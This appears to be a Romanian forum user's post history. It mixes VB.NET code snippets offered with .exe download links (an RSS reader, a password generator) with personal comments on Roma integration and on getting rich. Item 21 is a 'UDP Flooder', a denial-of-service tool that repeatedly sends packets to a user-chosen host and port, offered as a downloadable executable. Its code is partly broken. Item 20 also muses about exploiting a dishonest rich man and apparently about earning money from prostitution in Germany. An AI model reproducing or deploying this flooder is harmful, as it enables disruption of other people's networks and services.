  16. Download : RssReader.exe download - 2shared Imports System.Xml Public Class Form1 Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load Dim Xml As New XmlDocument Xml.Load("http://www.vbmania.com.br/rss") Dim noXml As XmlNodeList = Xml.SelectNodes("/rss/channel/item") For i = 0 To noXml.Count - 1 DataGridView1.Rows.Add(noXml.Item(i).ChildNodes(0).InnerText, _ noXml.Item(i).ChildNodes(2).InnerText) Next End Sub End Class Sursa : Creating an RSS feed reader in C# (C# Programming Tutorial) • Geekpedia
  17. Romi nu au o influenta proasta si nici rea numai ca mentalitatea fiecariei persoane daca se bazeaza pe RASISM si DIFERENTIERE atunci ei se simt ofensati deci mai bine ne-am gandi cum sa ii integram si sa lasam de o parte EMARGINAREA , sa incercam sa fim cat mai putin RASISTI . De cate ori apare un " rom " intr-o scoala plina de romani e emarginat si vazut cu alti ochi .
  18. Downlaod : Random PW Generator.exe download - 2shared Download2 : Zippyshare.com - Random PW Generator.exe Public Class Form1 Public Function makepw() As Object Dim e, f, g, h, j As Object e = "1256b47b4b42v8924242yvrehr4eh8er4h89erherh19eh89hr849h4r9eh8re9h489re4h89erh89re4hr484hrehrhererje8j949eyuvwebyevyeuvqiubvbuebvebvbviqbqi" f = Len(e) g = 30 'This is the lenht of the password Randomize() h = "" For instep = 1 To g j = Int((f * Rnd())) + 1 h = h & Mid(e, j, 1) Next makepw = h End Function Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim a As String While ListBox1.Items.Count < 100 'Change this number for more passwords a = makepw() ListBox1.Items.Add(a) End While End Sub End Class
  19. bc-vnt

    Fcd

    Forta STEAUA
  20. Primul lucru as incerca sa iau legatura cu omul care imi doresc sa ajung ca el , ma fac " frate " cu dracu , trag pe el cat pot , pentru ca un om ca el nu are bani dintr-o munca cinstita , multi muncesc o viata si poat nu strage cat omul care l-ai descris in theard , apoi cu banii de pe urma lui ii investesc intr-un anumit lucru , lucrul poate fi o firma de contrsuctii , imobiliare ceea ce se cauta acum pentru ca am inceput sa ne " emancipam " iar lucrul manual nu prea mai are efect , dar toti stim ca este cel mai bun . P.S - sau mi-as " cumpara " un loc pe strada in Germania si as face niste banuti frumosi .
  21. Download : UDP Flooder.exe download - 2shared Download2 : Zippyshare.com - UDP Flooder.exe Imports System.Net, System.Net.Sockets, System.ComponentModel Imports System.Windows.Forms.VisualStyles.VisualStyleElement Public Class Form1 Public Enum Staus Attaking = 1 Stopped = 2 End Enum Friend WithEvents bgFlood As New BackgroundWorker Dim IsFlooding As Boolean = False Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load bgFlood.WorkerReportsProgress = True End Sub Private Sub Flood(ByVal sende As Object, ByVal e As DoWorkEventArgs) Handles bgFlood.DoWork Dim IP As IPAddress = IPAddress.Parse(Host.Text) Dim IPandPort As New IPEndPoint(IP, Convert.ToInt32(Port.Text)) Dim Packet As Byte() = New Byte(PacketSize.Text) {} Dim SockNum As Integer = Sockets.Text Do While IsFlooding = True For i = 0 To SockNum If IsFlooding = True Then Dim _Sock(i) As Socket _Sock(i) = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp) Try _Sock(i).SendTo(Packet, IPandPort) bgFlood.ReportProgress(Status) Threading.Thread.Sleep(500) Catch ex As Exception Threading.Thread.Sleep(500) End Try Else Exit Do End If Next Loop bgFlood.ReportProgress(Status) End Sub Private Sub Report(ByVal sender As Object, ByVal e As ProgressChangedEventArgs) Handles bgFlood.ProgressChanged Select Case e.ProgressPercentage Case Status() ListBox1.Items.Add("Flooding..." & Date.Now.ToLocalTime) ListBox1.SelectedIndex = ListBox1.Items.Count - 1 Case Status() ListBox1.Items.Add("Stopped... -" & Date.Now.ToLocalTime) ListBox1.SelectedIndex = ListBox1.Items.Count - 1 End Select End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click IsFlooding = True If Not bgFlood.IsBusy = False Then bgFlood.RunWorkerAsync() End If End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click IsFlooding = False End Sub Private Function Status() As Integer Throw New NotImplementedException End Function End Class
×
×
  • Create New...